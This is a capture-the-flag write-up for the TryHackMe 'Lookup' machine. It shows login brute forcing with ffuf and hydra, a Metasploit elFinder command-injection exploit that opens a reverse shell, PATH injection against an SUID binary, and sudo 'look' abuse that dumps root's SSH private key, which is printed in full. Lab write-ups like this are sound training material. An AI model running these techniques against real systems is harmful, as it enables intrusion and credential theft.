THM Lookup
Summary
This is a Linux machine with ssh and web services. According to the different responses are
generated based on different credentials, we can fuzz the credentials for login.php. After login
into the system, there is version disclose of the platform. We leverage it to get foothold.
First of all, we are a low-privilege (www-data) user. Fortunately, there is a dedicated SUID program
reserved for us to read password of the user (think).
After that, we can discovery that there is a sudo rule for us to read arbitrary files. We can steal the
root's ssh private key!!
Scope
- Name: Lookup
- Difficulty: Easy
- OS: Linux
- IP: 10.48.145.40
Learned
- If we discover that a login form responses differently based on different credential, we can fuzz it.
- A leaked version may introduce vulnerabilities here.
- During privilege escalation, SUID and sudo rules must be considered first.
Enumeration
Nmap
To minimize interaction (which must be considered in real-world scenarios), we will establish
separate policies for TCP and UDP scans. First, we will scan the overall port openness of the host,
then conduct detailed scans on these open ports. Simultaneously, we will also scan certain common
UDP ports.
Overall
nmap -sT --min-rate 5000 -oN overall [IP] to obtain the overall status of the host (which
ports are open), the --min-rate parameter should be flexibly adjusted based on the actual scenario.
Host is up (0.36s latency). Not shown: 996 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http
Detail
nmap -sC -sV -O -vv -p22,80 -oN detail [IP]
PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 62 OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 9e:1b:df:4d:db:78:96:02:ad:7a:86:e0:76:80:00:36 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCsapH7U84iTYraALheWew/uooFTFFUoTZrp2yDBOF/dTHUup6xhT5eb0Znsys0kEywXOeu7HmkEuwVGCekGlNNQIE4FxhqAWdqIwLx+WODIwlpPjXQip5X1L3XmI7oqNgdMNKylpeu3LGSt/Auj1kk91sWrPNbrlQ66kShk+yHYE2LpcQKfLItc3Nl87qxvKtwj4iEP1w4ULvNYSZGdXq7lkLMLNcPHqEbZcQqqqPGg6AB1x85UY6ex6BJx1W3c/XXai/aSp5Y6vB4IZVvRCOb70VAOlUvvLJOgSoqM1EZQri+xhT5iNnWSFb11Uzymcxg9mbtGGu/CScH/mK1drB8crzFLzUCqAirM2CQDHim8K9HAZfRudMCCvoaRL70k1J+MZmR1IhPb/uGJ5Ef8jvuJDK/OyJzwhaE1twQOTBgTb4SyIj1McfYsPkm78Wwoqspc4e+tP0reQbqx1w3QbRreOQPuMdt0GuiVf4U6Wcmy+SXBi8k5ZkSa+Is1eRHpiU= | 256 80:67:03:2d:4a:12:29:ea:b7:29:ee:6d:cb:89:db:8f (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBL0SQBGTH2KsWxrLzodVXVyz1psyz8F9cGx54m5Ljdd1sHJe99mLKLI8VtmYlCRVyRROmuHOjK1iclZNbk+NdVk= | 256 71:84:a8:de:8b:3f:cf:bc:97:df:1c:a5:50:6d:6d:69 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIADCsy61VH+ajd0kTAacpVDxDseSQfFTbkWciEZuCSAz 80/tcp open http syn-ack ttl 62 Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Did not follow redirect to http://lookup.thm |_http-server-header: Apache/2.4.41 (Ubuntu) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS
-sC (default script scan)
Which means --script=default, includes:
services detectionvulnerabilities detectioncommon reconwhich includesssh key,http titleetcbrute-force of default creds
-sV (service version detection)
It detects the specific services running on open ports along with their version information, rather than the services type based on the port number.
- Send detection package
- Parse the banner of the response
- Fingerprint match with
nmap-service-probesDB
-O (OS detection)
It detects OS version and type by analyzing its network behavior.
- Send specific TCP, UDP, ICMP package
- Analyze response characteristics - Detect TCP window size, TTL value, IP ID sequence, TCP options, etc.
UDPScan
nmap -sU --top-ports 32 -N udpscan [IP]
Host is up (0.32s latency). PORT STATE SERVICE 53/udp closed domain 67/udp open|filtered dhcps 68/udp open|filtered dhcpc 69/udp closed tftp 111/udp open|filtered rpcbind 123/udp open|filtered ntp 135/udp closed msrpc 136/udp closed profile 137/udp closed netbios-ns 138/udp closed netbios-dgm 139/udp closed netbios-ssn 161/udp closed snmp 162/udp closed snmptrap 445/udp open|filtered microsoft-ds 500/udp closed isakmp 514/udp open|filtered syslog 520/udp closed route 631/udp open|filtered ipp 996/udp closed vsinet 997/udp closed maitrd 998/udp open|filtered puparp 999/udp closed applix 1434/udp closed ms-sql-m 1701/udp open|filtered L2TP 1812/udp closed radius 1900/udp closed upnp 3283/udp closed netassistant 4500/udp open|filtered nat-t-ike 5353/udp closed zeroconf 49152/udp closed unknown 49153/udp closed unknown 49154/udp closed unknown
Fuzz (credentials)
When we access port 80, there is a login form. Additionally, we observed that it responds differently based on different credentials.
$ ffuf -w user.txt -X POST -u http://lookup.thm/login.php -d 'username=FUZZ&password=123' -H 'Content-Type: application/x-www-form-urlencoded;charset=UTF-8'
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : POST
:: URL : http://lookup.thm/login.php
:: Wordlist : FUZZ: /media/psf/workspace/thm/lookup/user.txt
:: Header : Content-Type: application/x-www-form-urlencoded;charset=UTF-8
:: Data : username=FUZZ&password=123
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
lookup [Status: 200, Size: 74, Words: 10, Lines: 1, Duration: 410ms]
root [Status: 200, Size: 74, Words: 10, Lines: 1, Duration: 410ms]
admin [Status: 200, Size: 62, Words: 8, Lines: 1, Duration: 1348ms]
:: Progress: [3/3] :: Job [1/1] :: 3 req/sec :: Duration: [0:00:01] :: Errors: 0 ::
┌──(curtain㉿Kali)-[/media/psf/workspace/thm/lookup]
└─$ curl -X POST -H 'Content-Type: application/x-www-form-urlencoded;charset=UTF-8' -d 'username=admin&password=123' http://lookup.thm/login.php
Wrong password. Please try again.<br>Redirecting in 3 seconds.
┌──(curtain㉿Kali)-[/media/psf/workspace/thm/lookup]
└─$ curl -X POST -H 'Content-Type: application/x-www-form-urlencoded;charset=UTF-8' -d 'username=root&password=123' http://lookup.thm/login.php
Wrong username or password. Please try again.<br>Redirecting in 3 seconds.
At the moment, the first thought that came to mind was that perhaps we could fuzz the credentials.
Fuzz User
First, we fuzz user which will respond with "Wrong password" if that user exist.
$ ffuf -w /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -X POST -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=FUZZ&password=123' -u http://lookup.thm/login.php -fw 10
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : POST
:: URL : http://lookup.thm/login.php
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : username=FUZZ&password=123
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 10
________________________________________________
admin [Status: 200, Size: 62, Words: 8, Lines: 1, Duration: 5007ms]
jose [Status: 200, Size: 62, Words: 8, Lines: 1, Duration: 344ms]
Fuzz password
$ ffuf -w /usr/share/wordlists/seclists/Passwords/Common-Credentials/2023-200_most_used_passwords.txt -X POST -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=jose&password=FUZZ' -u http://lookup.thm/login.php -fw 8
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : POST
:: URL : http://lookup.thm/login.php
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Passwords/Common-Credentials/2023-200_most_used_passwords.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : username=jose&password=FUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 8
________________________________________________
password123 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 346ms]
:: Progress: [200/200] :: Job [1/1] :: 21 req/sec :: Duration: [0:00:10] :: Errors: 2 ::
Foothold
Version Disclose
After we login into the system. The following will be what we see.
We know that elFinder 2.1.47 running on that platform.
Command Injection
Search Google with 'elFinder 2.1.47 vuln' keyword, we will find this post command injection and
there is a mudule within metasploit:
msf > search elfinder Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/http/builderengine_upload_exec 2016-09-18 excellent Yes BuilderEngine Arbitrary File Upload Vulnerability and execution 1 exploit/unix/webapp/tikiwiki_upload_exec 2016-07-11 excellent Yes Tiki Wiki Unauthenticated File Upload Vulnerability 2 exploit/multi/http/wp_file_manager_rce 2020-09-09 normal Yes WordPress File Manager Unauthenticated Remote Code Execution 3 exploit/linux/http/elfinder_archive_cmd_injection 2021-06-13 excellent Yes elFinder Archive Command Injection 4 exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection 2019-02-26 excellent Yes elFinder PHP Connector exiftran Command Injection
We set required options according to the docs and boom! we get a meterpreter shell:
msf exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set rhost files.lookup.thm rhost => files.lookup.thm msf exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run [*] Started reverse TCP handler on 192.168.145.249:4444 [*] Uploading payload '8GrWf3nHF.jpg;echo 6370202e2e2f66696c65732f3847725766336e48462e6a70672a6563686f2a202e445163764c642e706870 |xxd -r -p |sh& #.jpg' (1937 bytes) [*] Triggering vulnerability via image rotation ... [*] Executing payload (/elFinder/php/.DQcvLd.php) ... [*] Sending stage (41224 bytes) to 10.48.145.40 [+] Deleted .DQcvLd.php [*] No reply [*] Removing uploaded file ... [+] Deleted uploaded file meterpreter >
Privilege Escalation
SUID
Now, we are a low-privilege user.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
We can discover all the users by /etc/passwd, we filter nologin user here.
cat /etc/passwd | grep -e 'sh$'
root:x:0:0:root:/root:/usr/bin/bash
think:x:1000:1000:,,,:/home/think:/bin/bash
ssm-user:x:1001:1001::/home/ssm-user:/bin/sh
ubuntu:x:1002:1003:Ubuntu:/home/ubuntu:/bin/bashLet's explore the content of their home directory.
ls -al /home/ubuntu
total 24
drwxr-xr-x 3 ubuntu ubuntu 4096 Jan 13 08:30 .
drwxr-xr-x 5 root root 4096 Jan 13 08:30 ..
-rw-r--r-- 1 ubuntu ubuntu 220 Jan 11 2024 .bash_logout
-rw-r--r-- 1 ubuntu ubuntu 3771 Jan 11 2024 .bashrc
-rw-r--r-- 1 ubuntu ubuntu 807 Jan 11 2024 .profile
drwx------ 2 ubuntu ubuntu 4096 Jan 13 08:30 .ssh
ls -al /home/ssm-user
total 20
drwxr-xr-x 2 ssm-user ssm-user 4096 May 28 2025 .
drwxr-xr-x 5 root root 4096 Jan 13 08:30 ..
-rw-r--r-- 1 ssm-user ssm-user 220 Jan 11 2024 .bash_logout
-rw-r--r-- 1 ssm-user ssm-user 3771 Jan 11 2024 .bashrc
-rw-r--r-- 1 ssm-user ssm-user 807 Jan 11 2024 .profile
ls -al /home/think
total 40
drwxr-xr-x 5 think think 4096 Jan 11 2024 .
drwxr-xr-x 5 root root 4096 Jan 13 08:30 ..
lrwxrwxrwx 1 root root 9 Jun 21 2023 .bash_history -> /dev/null
-rwxr-xr-x 1 think think 220 Jun 2 2023 .bash_logout
-rwxr-xr-x 1 think think 3771 Jun 2 2023 .bashrc
drwxr-xr-x 2 think think 4096 Jun 21 2023 .cache
drwx------ 3 think think 4096 Aug 9 2023 .gnupg
-rw-r----- 1 root think 525 Jul 30 2023 .passwords
-rwxr-xr-x 1 think think 807 Jun 2 2023 .profile
drw-r----- 2 think think 4096 Jun 21 2023 .ssh
lrwxrwxrwx 1 root root 9 Jun 21 2023 .viminfo -> /dev/null
-rw-r----- 1 root think 33 Jul 30 2023 user.txt
We see there is a user.txt and .passwords file within user think. But we don't have permission to
read it. So we need to elevate privileges to the user think.
Let's find SUID files first:
www-data@ip-10-48-145-40:/tmp$ find / -perm -u=s 2>/dev/null
find / -perm -u=s 2>/dev/null
/snap/snapd/19457/usr/lib/snapd/snap-confine
/snap/core20/1950/usr/bin/chfn
/snap/core20/1950/usr/bin/chsh
/snap/core20/1950/usr/bin/gpasswd
/snap/core20/1950/usr/bin/mount
/snap/core20/1950/usr/bin/newgrp
/snap/core20/1950/usr/bin/passwd
/snap/core20/1950/usr/bin/su
/snap/core20/1950/usr/bin/sudo
/snap/core20/1950/usr/bin/umount
/snap/core20/1950/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1950/usr/lib/openssh/ssh-keysign
/snap/core20/1974/usr/bin/chfn
/snap/core20/1974/usr/bin/chsh
/snap/core20/1974/usr/bin/gpasswd
/snap/core20/1974/usr/bin/mount
/snap/core20/1974/usr/bin/newgrp
/snap/core20/1974/usr/bin/passwd
/snap/core20/1974/usr/bin/su
/snap/core20/1974/usr/bin/sudo
/snap/core20/1974/usr/bin/umount
/snap/core20/1974/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1974/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/pwm
/usr/bin/at
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/umount
There is a special program called /usr/sbin/pwm will catch our attention. Use the strings command to
take a quick look at this program's string table.
strings /usr/sbin/pwm ... u+UH []A\A]A^A_ [!] Running 'id' command to extract the username and user ID (UID) [-] Error executing id command uid=%*u(%[^)]) [-] Error reading username from id command [!] ID: %s /home/%s/.passwords [-] File /home/%s/.passwords not found :*3$" GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0 crtstuff.c ...
It appears to execute the id command and manipulate the .passwords file within the user's directory.
Let's test whether a PATH Injection vulnerability exists.
PATH Injection
www-data@ip-10-48-145-40:/tmp$ echo '#!/bin/bash' > id
echo '#!/bin/bash' > id
www-data@ip-10-48-145-40:/tmp$ chmod +x id
chmod +x id
www-data@ip-10-48-145-40:/tmp$ echo 'echo "uid=5(think) gid=5(think) groups=5(think)"' >> id
< "uid=5(think) gid=5(think) groups=5(think)"' >> id
www-data@ip-10-48-145-40:/tmp$cat id
cat id
#!/bin/bash
echo "uid=5(think) gid=5(think) groups=5(think)"
www-data@ip-10-48-145-40:/tmp$ ./id
./id
uid=5(think) gid=5(think) groups=5(think)
www-data@ip-10-48-145-40:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
www-data@ip-10-48-145-40:/tmp$ /usr/sbin/pwm
/usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: think
jose1006
jose1004
jose1002
Boom! we leverage this SUID program to read the /home/think/.passwords file.
Fuzz (ssh brute-force)
We have username and password wordlist, let's brute-force the ssh service with that.
$ hydra -l think -P think_password.txt lookup.thm ssh
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
[DATA] max 16 tasks per 1 server, overall 16 tasks, 50 login tries (l:1/p:50), ~4 tries per task
[DATA] attacking ssh://lookup.thm:22/
[22][ssh] host: lookup.thm login: think password: josemario.AKA(think)
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not completeBingo! We get it!
SUDO Rule Leverage (arb Read)
Let's check sudo rule with sudo -l first.
think@ip-10-48-145-40:~$ sudo -l
[sudo] password for think:
Matching Defaults entries for think on ip-10-48-145-40:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User think may run the following commands on ip-10-48-145-40:
(ALL) /usr/bin/look
Fortunately, look is similar to cat, which can read arbitrary files!
think@ip-10-48-145-40:~$ sudo /usr/bin/look '' /root/root.txt
5a285a9f257e45c68bb6c9f9f57d18e8Or, steal the root ssh private key:
think@ip-10-48-145-40:~$ sudo /usr/bin/look '' /root. /.ssh/id_rsa -----BEGIN OPENSSH PRIVATE KEY----- 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 -----END OPENSSH PRIVATE KEY-----
Copy that and we can login with root now:
ssh -i root_id_rsa [email protected]
root@ip-10-48-145-40:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ip-10-48-145-40:~# cat root.txt
5a285a9f257e45c68bb6c9f9f57d18e8
Read other posts